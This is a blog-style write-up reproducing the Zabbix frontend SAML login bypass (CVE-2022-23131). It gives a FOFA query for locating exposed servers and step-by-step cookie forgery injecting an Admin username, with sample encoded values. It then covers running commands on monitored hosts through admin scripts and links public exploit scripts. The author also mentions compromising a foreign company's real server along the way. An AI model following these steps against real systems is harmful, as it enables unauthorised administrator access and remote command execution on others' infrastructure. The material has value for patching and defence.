Title: Zabbix login bypass vulnerability recurrence (CVE-2022-23131)

Posted April 10Apr 10

0x00 Introduction

Recently, the zabbix vulnerability (CVE-2022-23131) was reproducing it and accidentally got the zabbix server of a foreign company. Zabbix Sia Zabbix is an open source monitoring system of Zabbix SIA (Zabbix Sia) in Latvia. The system supports network monitoring, server monitoring, cloud monitoring and application monitoring. There is a security vulnerability in Zabbix Frontend that a malicious actor can modify session data with SAML SSO authentication (non-default) enabled because the user login stored in the session is not verified. Unauthenticated malicious attackers may exploit this issue to escalate permissions and gain administrator access to the Zabbix front-end.

0x01 Vulnerability Cause

With SAML SSO authentication enabled (non-default), a malicious attacker can modify session data to implement authentication bypass. Unauthenticated malicious attackers may exploit this issue to escalate permissions and gain administrator access to the Zabbix front-end.

This vulnerability exists in the index_sso.php file. Since the index_sso.php file does not call the CEncryptedCookieSession:checkSign() method to verify the cookie, and the client's cookie can be forged.

It can be seen from the index_sso.php file that when saml_data exists in the forged cookie, the username_attribute data is obtained. If the user actually exists, a sessionid will be generated to achieve identity authentication bypass

0x02 Vulnerability Impact

5.4.8

5.0.18

4.0.36

0x03 Vulnerability recurrence

fofa: app='ZABBIX-Supervision System' body='saml'Execution curl -ksSIL http://xxx.com/

Get the value of the set-cookie, then perform url decoding, and then base64 decoding

URL decoding:

eyJzZXNzaW9uaWQiOiIxNzFiODAwOTI4NDQ2MmUxZGRhODAyYWFjODk5MDI2YyIsInNpZ24iOiJ0eTZSZVkzVDRxVEdYenJseFM2ZlpyNTRhT3pCMHBhS25vWHBhZDR3MHdKc2lwNTJ2aUdndytDUlpqeVJyQUJ5WDk5bGhNMVVHbFM4cTRwNjBKb1wvUGc9PSJ9

Base64 decoding:

{'sessionid':'171b8009284462e1dda802aac899026c','sign':'ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\/Pg=='}

Then splice the string

{'saml_data':{'username_attribute':'Admin'},'sessionid':'171b8009284462e1dda802aac899026c','sign':'ty6ReY3T4qTGXzrlxS6fZr54aOzB0paKnoXpad4w0wJsip52viGgw+CRZjyRrAByX99lhM1UGlS8q4p60Jo\/Pg=='}

After splicing, base64 encryption is performed

Then in the URLEncode

Execute the command

Find Administration-- Scripts to create a new script, here I created ifconfig

Find the latest data in the monitoring, then filter out the host group you want to execute, click the host name to execute the corresponding command

Or the GitHub exploit script: https://github.com/L0ading-x/cve-2022-23131https://github.com/Mr-xn/cve-2022-23131 execute the script, Admin is the default high-permission user, and gets its session value. The zbx_session value in the replacement cookie is payload, and then click Sign in with Single Sign-On (SAML) or use EditThisCookie to replace the cookie value successfully bypassed the login and entered the system.